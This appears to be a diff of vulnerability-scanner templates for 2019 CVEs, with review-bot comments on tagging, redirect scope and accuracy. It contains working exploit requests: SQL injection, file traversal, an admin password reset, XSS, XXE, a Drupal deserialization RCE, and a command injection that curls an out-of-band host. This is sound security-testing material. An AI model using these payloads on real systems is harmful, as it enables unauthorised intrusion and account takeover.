@@ -41,4 +29,3 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e6e4ab7c914c07c53ea240efcb78c630b5bffb30f5b57f296a9dcd97fcd7143c0220363f481f26d2c5443282b3ceaf319c44f59d7cb3e9e62ecc1f842495ee455301:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-16931.yaml b/poc/cve/CVE-2019-16931.yaml index e26b55142a..7cccc93c52 100644 --- a/poc/cve/CVE-2019-16931.yaml +++ b/poc/cve/CVE-2019-16931.yaml 
@@ -1,36 +1,24 @@ id: CVE-2019-16931 - info: - name: WordPress Visualizer <3.3.1 - Cross-Site Scripting + name: Visualizer < 3.3.1 - Stored Cross-Site Scripting (XSS) author: ritikchaddha severity: medium description: | - WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard. - remediation: | - Update to the latest version of WordPress Visualizer plugin (3.3.1) or apply the provided patch to fix the XSS vulnerability. + By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify meta data of an existing chart, and inject a XSS payload to be stored and later executed when an admin goes to edit the chart. reference: - https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44 - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf - - https://wpvulndb.com/vulnerabilities/9893 - https://nvd.nist.gov/vuln/detail/CVE-2019-16931 - - https://wordpress.org/plugins/visualizer/#developers + - https://wpvulndb.com/vulnerabilities/9893 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-16931 cwe-id: CWE-79 - epss-score: 0.00244 - epss-percentile: 0.62296 - cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* metadata: - verified: true - max-request: 1 - vendor: themeisle - product: visualizer - framework: wordpress - tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth,wpscan - -http: + verified: "true" + tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth +requests: - raw: - | POST /wp-json/visualizer/v1/update-chart HTTP/1.1 
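Review bot: The `tags:` line on the new side of CVE-2019-16931.yaml has no `intrusive` tag, although the raw request is a `POST /wp-json/visualizer/v1/update-chart` that, by the template's own description, modifies the metadata of an existing chart. A scan configured to exclude intrusive templates would still run this one and leave altered chart data on the target. I would tag it `tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth,intrusive`. Separately, `verified: "true"` is a quoted string here where the old side had the boolean `verified: true`. The request body and matchers continue in the next hunk.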
@@ -38,20 +26,16 @@ http: Content-Type: application/json {"id": 7, "visualizer-chart-type": ""} - matchers-condition: and matchers: - type: word part: body words: - '{"success":"Chart updated"}' - - type: word part: header words: - 'application/json' - - type: status status: - 200 -# digest: 490a0046304402201162300a4a1008ff6e7816c548ab6a7c9eda5874490d9f1e5a4cf2776e0a8c7e02200ca8e2bbf0048985c24e20727805a50410d1e5fa575a0e5256ea8f6c6335103e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-17418.yaml b/poc/cve/CVE-2019-17418.yaml index 035a45ca0c..86a6c43174 100644 --- a/poc/cve/CVE-2019-17418.yaml +++ b/poc/cve/CVE-2019-17418.yaml 
@@ -1,46 +1,30 @@ id: CVE-2019-17418 - info: - name: MetInfo 7.0.0 beta - SQL Injection + name: MetInfo 7.0 - SQL Injection author: ritikchaddha severity: high - description: | - MetInfo 7.0.0 beta is susceptible to SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter (a different issue than CVE-2019-16997). - remediation: | - Upgrade to a patched version of MetInfo or apply the necessary security patches provided by the vendor. + description: An issue was discovered in MetInfo 7.0. There is SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter, a different issue than CVE-2019-16997 reference: - - https://github.com/evi1code/Just-for-fun/issues/2 - https://nvd.nist.gov/vuln/detail/CVE-2019-17418 + - https://github.com/evi1code/Just-for-fun/issues/2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2019-17418 cwe-id: CWE-89 - epss-score: 0.44305 - epss-percentile: 0.97021 - cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: metinfo - product: metinfo - tags: cve,cve2019,metinfo,sqli - -http: + tags: metinfo,sqli,cve,cve2019 +requests: - method: GET path: - "{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin" - - host-redirects: true + redirects: true max-redirects: 2 - matchers-condition: and matchers: - type: word part: body words: - "43865094559" - - type: status status: - 200 -# digest: 4a0a00473045022039467ce1d76b17a59ec2de90caa403777ea1d07dbf15aae3baf7c5135e49495b022100c44c8b3b95df256585fc53df18ebd9f63867553f8fe3f8fdbaefee6c70ee55ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-18665.yaml b/poc/cve/CVE-2019-18665.yaml index 36b4018e5a..ebca99678f 100644 --- a/poc/cve/CVE-2019-18665.yaml +++ b/poc/cve/CVE-2019-18665.yaml 
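Review bot: `redirects: true` on the new side of CVE-2019-17418.yaml lets the request follow a redirect to any host, whereas the removed `host-redirects: true` kept it on the host being tested. With `max-redirects: 2`, a redirect from the target can send the scanner's follow-up request to a system outside the authorised scope. I would keep `host-redirects: true`. The same swap is made in CVE-2019-20224.yaml in this commit. It would also help to state in `description` that the classification is `PR:H` and the path is under `/admin/` while the request carries no session, so a miss presumably says nothing about an instance the scanner is not logged in to.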
@@ -1,30 +1,45 @@ id: CVE-2019-18665 + info: - name: DOMOS 5.5 - Directory Traversal + name: DOMOS 5.5 - Local File Inclusion author: 0x_Akoko severity: high description: | - The Log module in SECUDOS DOMOS before 5.6 allows local file inclusion. + SECUDOS DOMOS before 5.6 allows local file inclusion via the log module. + remediation: | + Apply the latest patch or update to a version that is not affected by this vulnerability. reference: - https://atomic111.github.io/article/secudos-domos-directory_traversal - https://vuldb.com/?id.144804 - - https://www.cvedetails.com/cve/CVE-2019-18665 - https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6 + - https://nvd.nist.gov/vuln/detail/CVE-2019-18665 + - https://www.cybersecurity-help.cz/vdb/SB2019110403 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-18665 cwe-id: CWE-22 + epss-score: 0.1062 + epss-percentile: 0.9447 + cpe: cpe:2.3:a:secudos:domos:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: secudos + product: domos tags: cve,cve2019,domos,lfi -requests: + +http: - method: GET path: - "{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 +# digest: 4a0a00473045022100e03bd2b0d604ee23a2a3c76f6bb80163f8f9704ebcc2d3d858167174a5a516ec022074d09be8ee48364febeecf0b8741706b71f7082264b50396e391ad5e54936b19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-18818.yaml b/poc/cve/CVE-2019-18818.yaml index 5ec5e8c48c..93039c65d6 100644 --- a/poc/cve/CVE-2019-18818.yaml +++ b/poc/cve/CVE-2019-18818.yaml 
@@ -1,47 +1,60 @@ id: CVE-2019-18818 info: - name: strapi CMS Unauthenticated Admin Password Reset + name: strapi CMS <3.0.0-beta.17.5 - Admin Password Reset author: idealphase severity: critical - description: "strapi CMS before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js." + description: strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js. + remediation: | + Upgrade Strapi CMS to a version higher than 3.0.0-beta.17.5 to mitigate the vulnerability. reference: - https://github.com/advisories/GHSA-6xc2-mj39-q599 - https://www.exploit-db.com/exploits/50239 - https://nvd.nist.gov/vuln/detail/CVE-2019-18818 + - https://github.com/strapi/strapi/releases/tag/v3.0.0-beta.17.5 + - https://github.com/strapi/strapi/pull/4443 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2019-18818 cwe-id: CWE-640 - tags: cve,cve2019,strapi,auth-bypass,intrusive + epss-score: 0.87514 + epss-percentile: 0.98345 + cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: strapi + product: strapi + tags: cve2019,strapi,auth-bypass,intrusive,edb,cve -requests: +http: - raw: - | POST /admin/auth/reset-password HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/json + {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"} + matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word + part: header words: - "application/json" - part: header - type: word - condition: and + part: body words: - '"username":' - '"email":' - '"jwt":' - part: body + condition: and + + - type: status + status: + - 200 extractors: - type: json 
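Review bot: The `description` and the new `remediation` in CVE-2019-18818.yaml do not tell the operator that a match changes state on the target. The request body sets `password` to a fixed string and the matcher requires `"jwt":` in the response, so a hit means an admin account now has a password that is published in this repository. The `intrusive` tag is kept, but I would add a line to `description` such as `A successful match changes an admin password to the value in the request body; restore or rotate it immediately after testing.` The extractors that continue in the next hunk also write the account's username and e-mail into scan output, which should be treated as sensitive.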
@@ -49,4 +62,4 @@ requests: - .user.username - .user.email -# Enhanced by mp on 2022/04/01 +# digest: 4a0a0047304502210081df5f0cc32786ad71128c32c5945d41ec5dbaf6f6daf949f754ec1f9df4367002202160172b4b62ebc8db475dd8f76b98b8332cbd826c48acc8ba3bb34ff5798525:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2019-19824.yaml b/poc/cve/CVE-2019-19824.yaml index a1631ebcf3..6ae24e6e21 100644 --- a/poc/cve/CVE-2019-19824.yaml +++ b/poc/cve/CVE-2019-19824.yaml 
@@ -1,33 +1,22 @@ id: CVE-2019-19824 info: - name: TOTOLINK Realtek SD Routers - Remote Command Injection + name: TOTOLINK - Remote Code Execution author: gy741 severity: high - description: | - TOTOLINK Realtek SDK based routers may allow an authenticated attacker to execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0. - remediation: | - Apply the latest firmware update provided by the vendor to fix the vulnerability. + description: On certain TOTOLINK Realtek SDK based routers, an authenticated attacker may execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0. 
reference: - https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html - - https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits - https://nvd.nist.gov/vuln/detail/CVE-2019-19824 - - https://sploit.tech + - https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2019-19824 cwe-id: CWE-78 - epss-score: 0.96678 - epss-percentile: 0.99548 - cpe: cpe:2.3:o:totolink:a3002ru_firmware:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: totolink - product: a3002ru_firmware tags: cve,cve2019,totolink,rce,router -http: +requests: - raw: - | POST /boafrm/formSysCmd HTTP/1.1 @@ -42,4 +31,3 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a00463044022064de6d01187e0885b3a902bc00eb89828ebbaa98bd7daac7e3e63860425ed46f022027b7199ac8c6ab75e78b4d329d0bb9ce383013337c3a4a8c7c5c3d6e45e481de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-20210.yaml b/poc/cve/CVE-2019-20210.yaml index c67f24fd4e..43994e7cf1 100644 --- a/poc/cve/CVE-2019-20210.yaml +++ b/poc/cve/CVE-2019-20210.yaml 
@@ -1,39 +1,25 @@ id: CVE-2019-20210 - info: - name: WordPress CTHthemes - Cross-Site Scripting + name: CTHthemes CityBook < 2.3.4 - Reflected XSS author: edoardottt severity: medium description: | - WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query. - remediation: | - Update to the latest version of the WordPress CTHthemes plugin, which includes a fix for this vulnerability. + The CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes for WordPress allow Reflected XSS via a search query. reference: - https://wpscan.com/vulnerability/10013 + - https://nvd.nist.gov/vuln/detail/CVE-2019-20210 - https://wpvulndb.com/vulnerabilities/10018 - https://cxsecurity.com/issue/WLB-2019120112 - - https://nvd.nist.gov/vuln/detail/CVE-2019-20210 - - https://themeforest.net/item/citybook-directory-listing-wordpress-theme/21694727 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-20210 cwe-id: CWE-79 - epss-score: 0.00822 - epss-percentile: 0.79929 - cpe: cpe:2.3:a:cththemes:citybook:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: cththemes - product: citybook - framework: wordpress - tags: wp-theme,wpscan,cve,cve2019,wordpress,citybook,xss - -http: + tags: cve,cve2019,wordpress,citybook,xss,wp-theme +requests: - method: GET path: - "{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=" - matchers-condition: and matchers: - type: word 
@@ -42,13 +28,10 @@ http: - "" - "/wp-content/themes/citybook" condition: and - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4b0a00483046022100d80c1251bd4d64c82d4d0b040ee6b2a646ecf3b597fa5dd40a4dbdbfc6886398022100e3c4c61f29e42d044684bea42900c22d46e9ece63fde4566d3882cab59a41f31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-20224.yaml b/poc/cve/CVE-2019-20224.yaml index 737adc003e..b7a2d0559b 100644 --- a/poc/cve/CVE-2019-20224.yaml +++ b/poc/cve/CVE-2019-20224.yaml @@ -1,33 +1,23 @@ id: CVE-2019-20224 - info: name: Pandora FMS 7.0NG - Remote Command Injection author: ritikchaddha severity: high description: | Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. - remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. reference: - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ - https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9 - https://nvd.nist.gov/vuln/detail/CVE-2019-20224 - https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view - - https://pandorafms.com/downloads/solved-pandorafms-742.mp4 + remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2019-20224 cwe-id: CWE-78 - epss-score: 0.2078 - epss-percentile: 0.95889 - cpe: cpe:2.3:a:artica:pandora_fms:7.0_ng:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: artica - product: pandora_fms tags: pandorafms,rce,cve,cve2019,authenticated,oast - -http: +requests: - raw: - | POST /pandora_console/index.php?login=1 HTTP/1.1 
@@ -41,19 +31,18 @@ http: Content-Type: application/x-www-form-urlencoded date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw - - host-redirects: true + cookie-reuse: true + redirects: true max-redirects: 2 - matchers-condition: and matchers: - type: word - name: "http" part: interactsh_protocol + name: http words: - "http" - - type: status status: - 200 -# digest: 4a0a00473045022100a0a40e69b720f4bd72cf7c2de38273f300a1d491e84a05bba10d06c0576d89eb022072a7eae7e7ce0b0433a99c4a98c6758137894bd28ab05eee6cbf9555dba01d71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/17 diff --git a/poc/cve/CVE-2019-20933.yaml b/poc/cve/CVE-2019-20933.yaml index c690a67121..99d7f8fd43 100644 --- a/poc/cve/CVE-2019-20933.yaml +++ b/poc/cve/CVE-2019-20933.yaml 
@@ -1,32 +1,48 @@ id: CVE-2019-20933 + info: - name: InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret - author: c-sh0 + name: InfluxDB <1.7.6 - Authentication Bypass + author: pussycat0x,c-sh0 severity: critical + description: InfluxDB before 1.7.6 contains an authentication bypass vulnerability via the authenticate function in services/httpd/handler.go. A JWT token may have an empty SharedSecret (aka shared secret). An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: Update Influxdb to version 1.7.6~rc0-1 or higher. reference: + - https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20933 + - https://github.com/influxdata/influxdb/compare/v1.7.5...v1.7.6 - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 - - https://github.com/influxdata/influxdb/issues/12927 - - https://github.com/c-sh0/security/blob/master/influxdb.txt + - https://github.com/influxdata/influxdb/commit/761b557315ff9c1642cf3b0e5797cd3d983a24c0 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2019-20933 cwe-id: CWE-287 - tags: cve,cve-2019,influxdb,auth-bypass -requests: + epss-score: 0.03528 + epss-percentile: 0.90551 + cpe: cpe:2.3:a:influxdata:influxdb:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: influxdata + product: influxdb + shodan-query: InfluxDB + tags: unauth,db,influxdb,misconfig + +http: - method: GET path: - - "{{BaseURL}}/query?q=SHOW%20DATABASES" - headers: - Authorization: Bearer {{token}} + - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES" + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: body words: - '"results":' - 
'"name":"databases"' condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022100a969a3ed276185e838c99ee844be26917a2a1313596974010b23c260eff4f52f022046190c8fa491950525a0dcd494aca4a29398efd0f4f97910bf3923a0193097a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-2616.yaml b/poc/cve/CVE-2019-2616.yaml index 8575f8f378..f6c8aa1ffb 100644 --- a/poc/cve/CVE-2019-2616.yaml +++ b/poc/cve/CVE-2019-2616.yaml @@ -1,30 +1,19 @@ id: CVE-2019-2616 - info: - name: Oracle Business Intelligence/XML Publisher - XML External Entity Injection + name: XXE in Oracle Business Intelligence and XML Publisher author: pdteam severity: high - description: Oracle Business Intelligence and XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 are vulnerable to an XML external entity injection attack. - remediation: | - Apply the necessary patches or updates provided by Oracle to fix this vulnerability. + description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 - https://www.exploit-db.com/exploits/46729 - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html - - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2019-2616 - epss-score: 0.93837 - epss-percentile: 0.9891 - cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: oracle - product: business_intelligence_publisher - tags: cve,cve2019,oracle,xxe,oast,kev,edb - -http: + tags: cve,cve2019,oracle,xxe,oast,kev +requests: - raw: - | POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 
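Review bot: After this change CVE-2019-20933.yaml no longer tests for the CVE it is named after. The `Authorization: Bearer {{token}}` header is removed and the request is a plain unauthenticated `/query?db=db&q=SHOW%20DATABASES`, while `id`, `severity: critical` and the `classification` block still claim CVE-2019-20933. A patched InfluxDB that simply has authentication disabled would be reported as the critical JWT bypass, and a vulnerable instance with authentication enabled would presumably reject the request and be missed. The new `tags: unauth,db,influxdb,misconfig` describe what the request actually detects, so I would either move this check to a misconfiguration template with its own id, or keep the bearer-token request in the CVE template and restore its CVE tags.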
@@ -33,10 +22,8 @@ http: Content-Type: text/xml; charset=UTF-8 - matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a0047304502204ebea11db80f8573b9fe135a69fb43402356bdb57922e77068dd3985fd4a5116022100e3c65b6c6eaac40895c8605e6dd6c0da08c791b28ba29c62a4cb40192f5a96bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-2767.yaml b/poc/cve/CVE-2019-2767.yaml index d56e4987ba..bf1dcb703f 100644 --- a/poc/cve/CVE-2019-2767.yaml +++ b/poc/cve/CVE-2019-2767.yaml 
@@ -1,30 +1,20 @@ id: CVE-2019-2767 info: - name: Oracle Business Intelligence Publisher - XML External Entity Injection + name: Oracle Business Intelligence - Publisher XXE author: madrobot severity: high - description: Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher. - remediation: | - Apply the latest security patches provided by Oracle to fix this vulnerability. + description: There is an XXE vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher. reference: - - https://www.exploit-db.com/exploits/46729 - - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html - https://nvd.nist.gov/vuln/detail/CVE-2019-2767 + - https://www.exploit-db.com/exploits/46729 + tags: cve,cve2019,oracle,xxe,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-score: 7.20 cve-id: CVE-2019-2767 - epss-score: 0.14972 - epss-percentile: 0.95265 - cpe: cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: oracle - product: bi_publisher - tags: edb,cve,cve2019,oracle,xxe,oast -http: +requests: - raw: - | GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f>%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1 
@@ -35,4 +25,3 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402205872d89e6bedfd4695376f1b2b870b2f26b4cd1de9e1e7a7f98d95bd70e5da32022032b4ebfabd03e6141fd438fd0e40fec4e12db2f0f124f8f3e81206fce5700566:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-6340.yaml b/poc/cve/CVE-2019-6340.yaml index e6d6680309..28e4bf0974 100644 --- a/poc/cve/CVE-2019-6340.yaml +++ b/poc/cve/CVE-2019-6340.yaml 
@@ -1,34 +1,51 @@ id: CVE-2019-6340 + info: - name: Drupal 8 core RESTful Web Services RCE + name: Drupal - Remote Code Execution author: madrobot severity: high - description: Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases. + description: Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10 V contain certain field types that do not properly sanitize data from non-form sources, which can lead to arbitrary PHP code execution in some cases. + remediation: | + Apply the official security patch provided by Drupal to fix the deserialization vulnerability. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-6340 - https://www.drupal.org/sa-core-2019-003 - - http://web.archive.org/web/20210125004201/https://www.securityfocus.com/bid/107106/ - https://www.synology.com/security/advisory/Synology_SA_19_09 + - https://nvd.nist.gov/vuln/detail/CVE-2019-6340 + - https://www.exploit-db.com/exploits/46452/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2019-6340 cwe-id: CWE-502 + epss-score: 0.97484 + epss-percentile: 0.99967 + cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: drupal + product: drupal + shodan-query: http.component:"drupal" tags: cve,cve2019,drupal,rce,kev -requests: + +http: - method: POST path: - '{{BaseURL}}/node/1?_format=hal_json' + body: '{ "link": [ { "value": "link", "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" } 
], "_links": { "type": { "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default" } } }' + matchers-condition: and matchers: - type: word + part: body words: - "uid=" - "gid=" - "groups=" condition: and - part: body + - type: status status: - 200 + +# digest: 4b0a00483046022100cff2952f0ae8495a2290acc3ee01fa48296f8bfb34ecb5e6fae07cc11e177efe022100b8b3cab46c9b68856038b09f21feb4985990bff27e31d18461ff6d6930f1efd0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2019-7238.yaml b/poc/cve/CVE-2019-7238.yaml index e6d8c9427e..fc82673765 100644 --- a/poc/cve/CVE-2019-7238.yaml +++ b/poc/cve/CVE-2019-7238.yaml @@ -1,20 +1,30 @@ id: CVE-2019-7238 info: - name: NEXUS < 3.14.0 Remote Code Execution + name: Sonatype Nexus Repository Manager <3.15.0 - Remote Code Execution author: pikpikcu severity: critical - tags: cve,cve2019,nexus,rce + description: Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution. + remediation: | + Upgrade Sonatype Nexus Repository Manager to a version higher than 3.15.0. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-7238 - https://github.com/jas502n/CVE-2019-7238 + - https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019 + - https://nvd.nist.gov/vuln/detail/CVE-2019-7238 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2019-7238 - description: "Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control." + epss-score: 0.97422 + epss-percentile: 0.99923 + cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: sonatype + product: nexus + tags: cve,cve2019,nexus,rce,kev -requests: +http: - raw: - | POST /service/extdirect HTTP/1.1 
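Review bot: The rewritten `description` contains a stray token, "Drupal 8.6.x before 8.6.10 V contain certain field types"; it should read `Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10 contain certain field types that do not properly sanitize data from non-form sources`. Separately, the unchanged `body` still sets `_links.type.href` to `http://192.168.1.25/drupal-8.6.9/...`, which looks like a value left over from the author's lab. If the target compares that link with its own host, the check would presumably report false negatives, so a comment explaining why the fixed address is acceptable would help whoever triages the results.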
